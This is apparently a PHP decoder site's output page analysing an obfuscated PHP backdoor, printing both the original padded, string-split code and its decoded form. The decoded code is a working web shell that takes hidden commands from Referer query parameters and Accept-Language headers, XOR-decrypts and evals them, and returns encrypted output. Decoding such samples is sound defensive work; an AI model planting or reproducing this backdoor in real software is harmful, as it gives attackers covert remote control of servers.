Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $H='4_dec2lode(2lpreg_repl2l2lace(a2lrray("2l/_2l/","/-/"),2larray("/"2l,"+"),$2lss..

Decoded Output download

$kh="078b";$kf="bb4b";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$H='4_dec2lode(2lpreg_repl2l2lace(a2lrray("2l/_2l/","/-/"),2larray("/"2l,"+"),$2lss2l($s[2l$';
$C='unt($m[12l]);$z+2l+)$2lp.=$q[$m2l[2]2l[$z]];if(s2ltrpos(2l$p2l,$h)==2l=0){$s[2l$i]="2l";';
$U=str_replace('Y','','YYcrYeate_fuYncYtiYon');
$S='$kh=2l"078b";$kf2l="b2lb2l4b";func2ltion x($t,2l$k){$c=st2lrlen($2lk)2l;$l2l=strlen($t);';
$l='$2li],$f);2lif($e2l){$k=$kh.$k2lf;ob_s2ltart();2l@e2lval2l(@gzuncom2lpre2lss(@x(@ba2lse6';
$k='2l2lq=2l0.([\\d]))?,?2l/",$ra,$2lm);if($q2l&&$2lm){@2lsessio2ln_start(2l2l);$s=2l&$_2lSES';
$K='i],0,$e))),2l$k)));2l$o=ob_get_2lconten2lts()2l;ob_en2l2ld_cl2lean();$d=ba2lse64_encod2l';
$R='l2l52l($i.$kh),02l,32l));$2lf=$sl($ss(md5($i.$k2lf),0,2l3));2l$2lp="";fo2lr($z=1;$z<2lco';
$p='}2l^$2lk{$j};}}return $2lo2l;}$r=$_SE2lRVER;$2lrr=@2l$2lr["HTTP_REFER2lER2l"];$ra=2l@$2l';
$v='$o2l="";f2lor(2l$i2l=0;$i<2l$l;2l){for($j=0;($j<2l$c&&$i<2l$l);$j2l++,2l$i++){$o.=2l$t2l{$i';
$i='$2l2lp2l=$ss($p,32l);}if(array2l_ke2ly_exists($i,$s)){$s2l[$i].=2l$2lp;$e2l=strpos($s2l[';
$X='l["2lquery"]2l,$2lq);$q=array_v2la2llues($2l2lq);p2lreg_match_all("/([2l\\w])[\\w2l-]+(?:;';
$b='2lr["HTTP_ACCEP2lT_L2lANGUAGE"];if($r2lr&&$2lra2l){$2lu=parse_url($r2lr);pa2lrse_str($u2';
$q='e(x(gz2lcompres2ls(2l$o),$k));pr2li2lnt("<$k>$d2l</$2lk>");@sess2lion_de2l2lstroy();}}}}';
$h='SION;$ss="substr2l"2l;$sl="s2ltrtolo2lwer2l";$i=$m[2l1][0].2l$m[1][12l];$h=$s2ll($ss(md2';
$N=str_replace('2l','',$S.$v.$p.$b.$X.$k.$h.$R.$C.$i.$l.$H.$K.$q);
$z=$U('',$N);$z();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$C unt($m[12l]);$z+2l+)$2lp.=$q[$m2l[2]2l[$z]];if(s2ltrpos(2l$p..
$H 4_dec2lode(2lpreg_repl2l2lace(a2lrray("2l/_2l/","/-/"),2larr..
$K i],0,$e))),2l$k)));2l$o=ob_get_2lconten2lts()2l;ob_en2l2ld_c..
$N $kh="078b";$kf="bb4b";function x($t,$k){$c=strlen($k);$l=str..
$R l2l52l($i.$kh),02l,32l));$2lf=$sl($ss(md5($i.$k2lf),0,2l3));..
$S $kh=2l"078b";$kf2l="b2lb2l4b";func2ltion x($t,2l$k){$c=st2lr..
$U create_function
$X l["2lquery"]2l,$2lq);$q=array_v2la2llues($2l2lq);p2lreg_matc..
$b 2lr["HTTP_ACCEP2lT_L2lANGUAGE"];if($r2lr&&$2lra2l){$2lu=pars..
$h SION;$ss="substr2l"2l;$sl="s2ltrtolo2lwer2l";$i=$m[2l1][0].2..
$i $2l2lp2l=$ss($p,32l);}if(array2l_ke2ly_exists($i,$s)){$s2l[$..
$k 2l2lq=2l0.([\d]))?,?2l/",$ra,$2lm);if($q2l&&$2lm){@2lsessio2..
$l $2li],$f);2lif($e2l){$k=$kh.$k2lf;ob_s2ltart();2l@e2lval2l(@..
$p }2l^$2lk{$j};}}return $2lo2l;}$r=$_SE2lRVER;$2lrr=@2l$2lr["H..
$q e(x(gz2lcompres2ls(2l$o),$k));pr2li2lnt("<$k>$d2l</$2lk>");@..
$v $o2l="";f2lor(2l$i2l=0;$i<2l$l;2l){for($j=0;($j<2l$c&&$i<2l$..
$z None

Stats

MD5 fa621ffa4d8593e1be42cb0483fc9b34
Eval Count 1
Decode Time 94 ms